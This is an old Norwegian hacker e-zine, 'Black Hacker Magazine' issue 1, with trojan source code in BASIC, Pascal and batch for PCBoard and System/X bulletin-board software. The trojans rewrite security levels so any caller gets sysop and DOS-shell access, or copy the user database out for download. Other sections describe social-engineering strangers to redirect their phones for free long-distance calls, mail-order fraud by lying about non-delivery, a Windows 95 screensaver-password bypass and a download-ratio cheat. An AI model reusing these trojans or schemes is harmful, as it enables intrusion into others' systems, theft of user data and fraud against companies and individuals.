Copy Link
Add to Bookmark
Report
Black Hacker Magazine Issue 01
· .______
: _/\_. _/\_. _/\_____ _/\_______ _/\_| /
¦ _\_ |_____\_ |_____\____ \_\_ .____/_\_ | __/
|:. / l_ \_ l \_ . \_ l \_ \_
|:::. /______. |___. |___| |___. |____| |
|:::::. wBr`-----' `-----' `-----' `-----' `-----'
`------------------------------------ -- -.______ - -- ------------------.
_/\_.___ _/\_____ _/\_______ _/\_| /_/\_____ _/\_____ ·::::|
_\_ | \_\____ \_\_ .____/_\_ | __/_\_ __ \_\_____ \ ·::|
/ \_ . \_ l \_ \_ \___/\_ _/ _/ ·|
<---/______| |___| |___. |____| |____. |___| \_---'
`-----' `-----' `-----' `-----' `-----'-u!`-----'
-*- MAGAZINE -*-
-*- black hacker magazine edition 1 -*-
^Note: We do not encourage people to do illigal stuff like hacking, and that
kinda shit, we give information about it for prevental & educationally
purposes only, so that sysops using these systems can protect theirselves.
Such information should be free in a true democracy...^
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
TABLE OF CONTENTS:
1.1 - PREFACE
1.2 - HACKING SECTION
1.2a - How to hack a BBS (General)
1.2b - How to hack Pcboard (Pascal & Basic trojans)
1.2c - How to hack System/X (Pascal & Batch trojan)
1.3 - PHREAKING SECTION
1.3a - How to trace your lines for free!
1.3b - How to call around the world for local fee!
1.4 - SOME TIPS&HINTS
1.4a - How to get CD's, Radio's, etc. for free! (legal!)
1.4b - A little WIN95 bug.
1.4c - How to use free download on every BBS.
1.5 - POSTGRADUATE (ENDING WORDS)
PROGRAMS.ZIP contains the diffrent trojan examples in this magazine,
sources and compiled versions.
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
1.1 - PREFACE
---------------------------------------------------------------------------
Welcome to this first edition of BLACK HACKER MAGAZINE. BHM is a new mag in
the H/P/A/C/V world, and since the writers are from Norway, we will see
everything from a norwegian view. That means that if you're from Norway,
these things explained here will 100% guaranteed work! (If we tell you how
to call free, it WILL work!). Most of the stuff herein will also work
in other countries around the world, and the hacking trojans/techniques
will ofcourse work everywhere. We'll try to explain how easy it really is
to hack the most populear systems around the world (and in Norway), like
PCBOARD 15.X, SYSTEM/X, etc. BHM is an official release by THE BLACK
HACKERS, but that doesn't necessary mean that all the persons writing for
this mag, are members of TBH. (It doesn't mean that they aren't either :)
Hope you enjoy this edition of BHM, and that you'll give us some feedback
on what you think of it, or if you think you have something to contribute
to the mag, and become a member.
-*- HACKING SECTION -*-
1.2a - How to hack a BBS (General)
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*
HACKING A BULLETIN BOARD SYSTEM
Many people think that hacking is very hard to manage, and only computer
wizards that has been coding for 10 years know how to do it, but in fact,
hacking is a very easy thing to do. Any BBS system can be hacked, the only
question is HOW?
If you want to hack a system, the first ting you do, is call up a BBS and
download the system. Either it's PCBOARD, BBBS, MBBS, S/X, etc. just
download the system, and unpack it. Then you configure it, and set it up,
until it runs nicely. There's no point of throwing away money, now you can
experiment, and try out hacking teqnices without paying jack shit :)...
You can do this in many ways. Fex. look for backdoors/errors in the system.
But that will take some time, if you have no clue at all -> Did the maker
of the system put in a backdoor, or?... The most efficient way (the one I
use) is to check out it's config and system files (*.CFG, *.DAT, *.etc ->
you'll find it) and check if they're pretty easy to change or what... And
you can also check if the system needs to have PATH variables (other inter-
esting variables) set in the enviroment, to run. If it does; Think of ways
to exploit these variables.
Most BBS systems actually have quite open cfg files, that can be configured
easily by a trojan. Fex. PCBOARD has the PCBOARD.DAT were the lines 6 to 23
is the Security level needed to start the sysop functions. If you use/
explore/experiment/look at the system for a while, I guarantee you; You will
find something that you can use to hack the system. Any system can be hacked,
and the only thing you need, is basic programming skills. Easy BASIC or
BATCH skills will do, but PAS/C++/ASSEMBLY skills is ofcourse preferable.
Hack some board! Don't listen to what others say: The first time is *GREAT*:)
Codeblaster/TBH^Food
1.2b - How to hack Pcboard (Pascal & Basic trojans)
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*
HOW TO HACK PCBOARD v15.X
Every BBS system is really quite simple to hack, if you just know something
about it. And after having a PCBOARD BBS some time, I've learned some things
about its system/configuration files, and ofcourse; How to hack it! :)
I don't think there are any backdoors in Pcboard (if you're not using a PPE
with backdoors in that is), and Pcboard can not be hacked using ANSi codes
or something like that either (as far as I know)... That means, that there
is only two GOOD ways to hack a Pcboard:
1. Using a PPE with a backdoor.
2. Making a trojan.
Number 1 you can use with lamers, but a Sysop that know a little about PCB
will always (and I say always, cause I've never met a Pcb sysop that doesn't)
decompile the PPE and check it for backdoors. So, the best way to hack it,
is by using a trojan. Here's a trojan that you can use to hack Pcb:
--------------------------> HACKPCB.BAS <-----------------------------------
OPEN "PCBOARD.DAT" FOR INPUT AS #1
OPEN "PCBTMP.DTA" FOR OUTPUT AS #2
WHILE NOT EOF(1)
X = X + 1
LINE INPUT #1, LINE$
IF X = 16 THEN LINE$ = "000"
IF X = 19 THEN LINE$ = "000"
PRINT #2, LINE$
WEND
CLOSE #1: CLOSE #2
KILL "PCBOARD.DAT"
NAME "PCBTMP.DTA" AS "PCBOARD.DAT"
--------------------------> HACKPCB.BAS <-----------------------------------
As small and harmfull as this little .BAS file seems, it will actually give
you access to 2 sysop commands: EXECUTE DOS COMMAND & USER MAINTAINANCE.
These commands are all you need to hack a board, but if you want to use other
commands, you just add: IF X = 6 THEN LINE$ = "000" up to 23...
This .BAS file could be done better. After all it's just a little example so
you can build further on. For this one to work, the sysop must place it in
the PCBOARD directory. You can exploit the %PCBDRIVE% and %PCBDIR% variables,
to get the PCB path (Belive it or not, some lame sysop's actually have these
variables set in their enviroment... Hack! Hack! Hack! :)
Here's another trojan, this one made in Pascal:
---------------------------> PCBHACK.PAS <----------------------------------
{ PCBHACK.PAS (For Turbo Pascal 7.0)
Simple routine for patching the PCBOARD.DAT so that any user can use one
sysop function: "EXECUTE DOS FUNCTION" (It's all you need to hack PCBOARD
and get access to ALL sysop commands..:) It will only work if it is placed
in the same directory as PCBOARD.DAT. PCBOARD.DAT will neither grow or
loose size... Needs optimizing you're gonna use it; errorchecking, searching
for PCBOARD.DAT (so it can be started from any dir) -> Use your imagination,
this is just an example, and is not meant to be usable for hacking :)..
Although you probably could hack some lamer with it ... heh ...
Made by Codeblaster/Food
}
PROGRAM HACKPCB;
var FIL: text;
FIL2: text;
LINE: string;
LINENUM: integer;
begin;
Assign(Fil, 'PCBOARD.DAT'); { open PCBOARD.DAT for read }
Assign(Fil2, 'PCBTMP.TMP'); { open TEMP file for write }
Rewrite(Fil2);
Reset(Fil);
While not Eof(Fil) do
begin;
Readln(Fil,LINE); {Read a line from PCBOARD.DAT}
Linenum := Linenum + 1;
If Linenum = 19 then LINE := '000'; { Trojan: Sec.Level needed=0 }
Writeln(Fil2,LINE); { Write a line to TEMP file }
end;
Close(Fil2); { Save new file }
Erase(fil); { Erase old file }
Rename(Fil2,'PCBOARD.DAT'); { Rename new file to old }
end.
---------------------------> PCBHACK.PAS <----------------------------------
Enough PCBOARD hacking for today :)
Text & examples written by Codeblaster/TBH^Food
1.2c - How to hack System/X (Batch trojan)
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*
HACKING SYSTEM EXPRESS (SYSTEM/X)
I installed SYSTEM/X on my PC for the only purpose of hacking it :), and it
took me and TNSe 5 minuts (top!) to find out how to do it... This must be the
most crappy system when it comes to Hack-protection ever!! :)
Anyway, we found out that there was two easy and secure ways to hack system/x
with a trojan;
1. ADDING A NEW COMMAND (.CMD file)
2. JUST THE PLAIN OLD USER FILE COPY :)
Both these ways are secure, and they will almost always work nicely. One big
reason is: The S/X sysop must have a variable set in his enviroment:
"SYSTEM=C:\HISBBSPATH\"
They often do this by placing a "SET SYSTEM=C:\MYBBSPATH\" in their AUTOEXEC.BAT
or in their SX batch file. If the variable above is not set, then SYSTEM/X
won't run... Easy to exploit or what?! :)... The little batch file below,
will copy the USER file to HOLD.. This will almost always work, as the only
directory the S/X sysops change is the main one (The other directories like
\HOLD, \COMMANDS, etc. they will not touch)...
Let's take a look at a simple batch trojan:
----------------------------> HACKSX.BAT <-----------------------------------
@echo off
if exist %SYSTEM%\DATA\USERS.DAT goto FOUNDIT
goto END
:FOUNDIT
copy %SYSTEM%\DATA\USERS.DAT %SYSTEM%\HOLD >nul
:END
ECHO.
ECHO Did not find any SX*.TMP -> Please run SYSTEM/X to take care of this.
ECHO.
----------------------------> HACKSX.BAT <-----------------------------------
This 9 lines long BATCH file will copy the USERS.DAT to \HOLD wich means that
you'll be able to download it. This hack is for downloading his user data only,
and you cannot have the fun DOSSHELL, etc... but what the heck, you can call
back as Sysop later... :) The batch file is a pretty secure hack because of
the environment variables that are explained above.
Here's a trojan written in Pascal, it will also exploit the variables in the
environment:
----------------------------> HACKSX.PAS <-----------------------------------
{HACKSX.PAS
This .PAS file will create the file NEW.CMD in the SX\COMMANDS
directory. The file contains a new command that can be used when
in System/X. The command is meant for Sysop originaly, but the
securitye level needed now is only 0. When you call the board
after sysop has run this file, you can just write "NEW" to view
any file on his HD (User.dat, log, etc.)
The program will find the directory to place the file, by checking
the Environment variables. As said earlier; these variables has to
be set, if you run System/X.
By Codeblaster }
PROGRAM HACKSYSTEMX;
uses Dos;
label foundit,endoffile;
var FIL: text;
LINE: string;
LINENUM: integer;
i: integer;
found: integer;
path: string;
begin
for I := 1 to EnvCount do
if POS('SYSTEM=',EnvStr(i)) > 0 then
begin;
found := 1;
goto foundit;
end;
if POS('SYSTEM =',EnvStr(i)) > 0 then
begin;
found := 2;
goto foundit;
end;
writeln('');
writeln('You do not have the correct variables set in your environment');
writeln('');
goto endoffile;
foundit:
path := EnvStr(i);
if found = 1 then Delete(path,1,7);
if found = 2 then Delete(path,1,8);
Assign(Fil, path+'\COMMANDS\NEW.CMD');
Rewrite(Fil);
Writeln(Fil,';----------------------------------------------------------------------------');
Writeln(Fil,'; Command "VS" Config File for System/X v1.0 BETA X-XMAS''94');
Writeln(Fil,';----------------------------------------------------------------------------');
Writeln(Fil,'COMMAND_INTERNAL = 9');
Writeln(Fil,'COMMAND_SECLVL = 0');
Writeln(Fil,'COMMAND_PASSWORD =');
Writeln(Fil,'COMMAND_PWD_PROMPT = Enter_Password:');
Writeln(Fil,'COMMAND_BEFORE_TXT =');
Writeln(Fil,'COMMAND_AFTER_TXT =');
Writeln(Fil,'COMMAND_BEFORE_DOOR =');
Writeln(Fil,'COMMAND_AFTER_DOOR =');
Close(Fil);
endoffile:
end.
----------------------------> HACKSX.PAS <-----------------------------------
That's all SYSTEM/X hacking you're gonna get for this time...
Codeblaster/TBH^Food
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*
-*- PHREAKING SECTION -*-
1.3a - How to trace your lines for free!
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%
HOW TO TRACE YOUR LINE FOR FREE!
If you run an elite/pirat board it's a great advantage to have your lines
traced, so that you can see who's calling. You're much safer, and the chance
for getting busted is minimal! You can see if a person types in fake phone
number, and if he does, you can check him up. (Just look in the phonebook,
or call an operator -> You'll know if he's a cop then). But, let's get down
to it, shall we?! :)... Swedish dewdes reading this are real lucky, cause
they won't have any trouble getting their hands on the thing I'm going to
tell you about now. It's a little box that they sell in Sweden. You attatch
it to your phone, and you get the number of the person calling on a display
the same sec. the phone rings. Cool eyh?! :)
Here's where you can order it:
STAR TEL -> +46-58552020
The price of the little beauty is 395,- (Swedish Krones -> aprox. 55$)
But, as I said, the swedish is the lucky ones, cause they don't sell to
foreigns. :(... I called them and tried to order one, but the bitch in
the phone just said: "Sorry, we don't sell to norwegians" (In swedish
ofcourse)... Hmm... but if you have a friend in sweden, it's all yours :)
The best part is: It's perfectly legal!.. (In Norway that is, if you're in
another country, I dunno...) I called the norwegian TeleNor to check it up,
and I talked to this guy. He said it wasn't anything illigal about the box,
and that it would most likely work in Norway too, as the swedish and the
norwegian Phone-system is very similar.
Diz info brought to you by ^ Codeblaster/TBH^Food
1.3b - How to call around the world for local fee!
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%
CALL AROUND THE WORLD AND ONLY PAY FOR LOCAL CALL!
I think everybody knows about this neat trick by now, but it's so cool that
I'm going to have it here anywayze :)... The phone-company has this service
that gives you the opitunity to redirect your phone when you're away, so that
if someone calls you, they will be redirected to a friend/neightbour of yours.
This is mainly to prevent thiefs from knowing that you're not at home.
The service can easily be exploitet, so that you can call world-wide, and
only pay for a local call... Pretty cool, I'll say. :)
The hard part is to find someones phone to redirect. You can do this in many
ways; Fex. go into a shop right before closing time and ask them if you can
borrow their phone a little bit (Most will say yes, for service). If you
redirect it then, no one will notice it before the day after. All night
calling! :)... Or you can be a real *BUDDY* and go over to a friend of yours
and redirect his phone :)... Or you can just call random numbers until there
is a kid/nerd/lamer answering the phone, and tell him "Hello. this is from
the phone company. We have to check something on the line. Can you please
write down these digits I tell you and enter them when I hang up?" :)..heh!
Here's how to redirect the phone in Norway (Viderekobling):
*21* + PHONENUMBER + #
And to remove it away again: #21#
Quite easy huh?! =)
Diz info brought to you by ^ Codeblaster/TBH^Food
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%
-*- SOME HINTS & TIPS -*-
1.4a - How to get CD's, Radio's, etc. for free! (legal!)
[i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i]
HOW TO GET CD'S, KNIFES, RADIOS FOR FREE! TOTALLY LEGAL!
METHOD 1: (Very legal, and very safe)
-------------------------------------
A couple a times per year you get some Mail-order catalouges in your mailbox.
In these catalouges they often advertice that you get a little present if you
"hurry up - and answer quick!" (Nor: Hurtigsvarspremie). That little gift is
often a little radio, pen, knife, watch etc, and what many people don't
know is that you can get these things they advertise for FREE, without
ordering their magazine (or whatever they're selling). You have, in fact,
the right to demand the stuff send to you for free (only mail costes charged)
according to Norwegian law. (That's right! You don't pay jack shit for the
radio, just the mail -> as long as it says: "Hurtigsvarspremie"-> or something
like that, as explained in english above)
So, the only thing you gotta do is call up the mail-order firm, and tell them
that you want the thing send to you for free, without beeing a member of their
(fucking) club/magazine. If they won't send you, then tell them that you have
the right to claim this after norwegian law, and that you will report them
to "forbrukerombudet" if they don't send it to you.
METHOD 2: (Not legal, but pretty safe)
--------------------------------------
This is pretty simple. You just order the CD's/video's you want (not many,
they have to fit your mailbox you know) and when you get them you just wait.
A couple of weeks later you'll get a bill saying that you have to pay, and
they've probably added some money to the ammount (Nor: Purring).
Then you can take action. Call them and tell them that you didn't get any
CD's. (remember not to do this before you get the second bill).
They'll say that the CD's probably have been lost in the mail, and that
they'll check it up with your local post-office.
Ofcourse, they never really do this, it's just to scare you. (But so what if
they do? -> Someone could have stolen it from your mail-box).
I've done this several times, and it have worked every one of them -> there's
nothing the Mail-order people can do, but to sit back and watch you steal
their CD's :) ... but remember: Never do this too many times, and never to
the same company more than twice (they'll get suspicious!), and never order
too much, cause then you'll have to go down to the post-office and collect
the packet (sign for it)-> and then they KNOW that you have got it!
Happy frauding!
iNfO by Codeblaster/TBH^Food
1.4b - A little WIN95 bug.
[i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i]
HOW TO BYPASS THE SCREENSAVER-PASSWORD IN WIN95
If you're in a computer store there often are several maschines standing
around with screensavers on. When you touch the maschines, you gotta enter
a password to do anything. Well, this is a pretty stupid BUG in WIN95, but
to bypass these screensaver-passwords without restarting the computer is
actually quite easy. Just press CTRL-ALT-DEL and choose END TASK (On the
screensaver ofcourse! (Marquee etc.)) Stuuupid bug, eyh?! :)
1.4c - How to use free download on every BBS.
[i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i]
HOW TO DOWNLOAD WITHOUT LOOSING BYTES
Everybody knows about this little trick, but coz it's so neat I'll put it in
here too :)... This works on every BBS system (I think).
Here's what you do:
1 - Flag the files you want to download
2 - Flag a last file that you don't want (preferable big)
3 - Start downloading
4 - When the BBS starts sending the last file press Ctrl-X
And voila -> the bytes you downloaded are not registered.
[i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i][i]
-*- POSTGRADUATE -*-
1.5 Ending words.
--------------------------------------------------------------------------
Well, this was the first edition of BHM. What do you think?!.. Did you
learn anything?! -> Give me some feedback and we'll continue writing
BLACK HACKER MAGAZINE. If I don't get any feedback at all, I'll probably
not write a second edition, even bad feedback is better than no feedback.
So, you can e-mail me at most boards in Norway under: Codeblaster .
(or just Codeblaster), og you can e-mail me at "bjornbo@askoy.vgs.no"
Hope you enjoyed BHM#1, watch out for the next one!
Codeblaster/TBH^Food
BTW; This one was entirely written by me... hope next one won't! Contribute!